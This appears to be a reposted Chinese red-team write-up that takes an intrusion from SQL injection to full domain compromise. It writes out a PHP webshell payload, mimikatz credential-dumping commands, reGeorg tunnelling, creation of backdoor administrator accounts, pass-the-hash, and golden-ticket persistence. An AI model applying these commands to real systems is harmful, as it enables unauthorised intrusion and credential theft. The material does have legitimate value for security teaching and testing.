前言

網絡安全的本質：懂進攻，知防守，先正向，后逆向。

本篇文章目錄

網絡拓撲圖：

本次紅隊攻防實戰所需繪制的拓撲圖如下：

邊界突破

訪問網站：

http://xxx.xxx.xxx/?id=1

首頁如下：

SQL注入拿shell

構造payload：and 1=1顯示正確，and 1=2顯示錯誤，說明存在SQL注入，并且爆出絕對路徑

使用常用的注入函數into outfile 將一句話木馬寫入自動創建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有寫入權限和上一步爆出的絕對路徑

驗證上傳的木馬是否成功，成功寫入木馬

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

成功利用蟻劍拿到shell

→點擊獲取網絡安全學習資料·攻略←

2000多本網絡安全系列電子書
網絡安全標準題庫資料
項目源碼
網絡安全基礎入門、Linux、web安全、攻防方面的視頻
網絡安全學習路線圖

內網信息收集

whoami
發現是普通用戶的權限

ipconfig /all
查看用戶的IP信息，可以看到位于工作組環境

route print
查看路由，通往10.0.1網段

net config Workstation
查看計算機名、全名、用戶名、系統版本、工作站

.利用蟻劍傳入Potato提權工具,并使用其虛擬終端，查看權限，提權。
將超時時間調大：

上傳Potato提權工具成功，改名為xxx.exe

使用命令可以看到成功提權
xxx.exe -p “whoami”

將mimikatz改名為x.exe，成功上傳

然后在終端執行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

查看log.txt，成功抓到當前用戶和另一用戶的密碼

和

netstat -ano查看是否開啟3389端口，發現已開啟

查看防火墻是開啟的
netsh firewall show state

reGeorg內網穿透

使用軟件reGeorg實現攻擊機與目標機器的通信
通過蟻劍將reGeorge中的tunnel.php上傳至網站改名為tu.php

并成功訪問

http://xx.xx.xx/tu.php

啟動reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都轉發給指定的那個url，1080是指定的監聽端口；

代理可以使用：

內網滲透

拿下邊界服務器
掛上代理遠程連接10.0.1.4

創建新賬號admin 并提權

xx.exe -p "net user xxx xxxx /add" //新增賬號和對應密碼 xx.exe -p "net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組

遠程連接

成功連接

將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼

成功抓到管理員賬戶密碼：
使用上述管理員賬號密碼，成功登陸服務器

通過nbtscan對當前C端進行掃描，發現還有三臺機器存活

拿下域內主機

根據我這個滲透時長兩年半的個人練習生的經驗來判斷，內網里的服務器的賬號密碼有部分可能是相同的。
再使用上述管理員賬號密碼遠程連接10.0.1.8

成功連接

whoami查看是administrator權限
ipconfig /all查看有域xx.xx

一般DNS服務器就是域控服務器

查詢域控主機名，遭拒絕，需利用官方工具將賬號提升至system權限，再查
net user /domain

上傳官方工具PsExec.exe提權
PsExec.exe -i -s -d cmd 提升至system權限，獲取主機名DC.xx.xx

嘗試訪問域控主機C盤
dir \DC.xx.xx\c$

是拒絕的，需要工具minikatz，使用哈希傳遞

拿下域控

將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼

獲取

user=administrator Domain=xxx NTLM=xxxxxxx

將上述值放入下方命令中，完成哈希傳遞，以后利用這個CMD窗口運行,擁有管理員權限。

sekurlsa::pth /user:administrator /domain:"xx.xx" /ntlm:xxxxxxx

啟動域控主機cmd窗口，成功訪問域控主機C盤
dir \DC.xx.xx\c$

使用官方工具PsExec.exe，命令如下：
PsExec.exe \dc.xx.xx cmd
進入c:
輸入ipconfig， 10.0.1.6為域控ip，此時成功獲取域控cmd

新建賬號，直接遠程登陸域控主機

"net user xxx xxxx /add" //新增賬號和對應密碼 "net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組

建好賬號后，直接登陸域控主機10.0.1.6(DC.xx.xx)，成功拿下域控主機權限

至此已成功拿下三臺主機的權限。

權限維持

可通過制作黃金票據進行權限維持
因為域控主機10.0.1.6安裝了補丁KB2871997，所以無法抓取到明文密碼
管理員運行獼猴桃
log 日志記錄內容
lsadump::dcsync /user:krbtgt 獲取內容

獲取krbtgt賬號的關鍵值（OSID和Hash_NTLM）

制作黃金票據

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如圖

票據加載成功

普通窗口無法訪問域控根目錄

把域控中的票據復制到在10.0.1.8主機中，使用獼猴桃加載票據
kerberos::ptt xxx.kiribi 加載票據

然后成功在普通cmd中訪問域控c盤內容
dir \DC.xx.xx\c$

PExec.exe \DC.xx.xx cmd 獲取域控cmd

結語

一名優秀的白帽子，是不能有短板的，有的只能是幾塊長板和很多的標準板。

總結

以上是生活随笔為你收集整理的红队攻防之从边界突破到漫游内网(无cs和msf)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。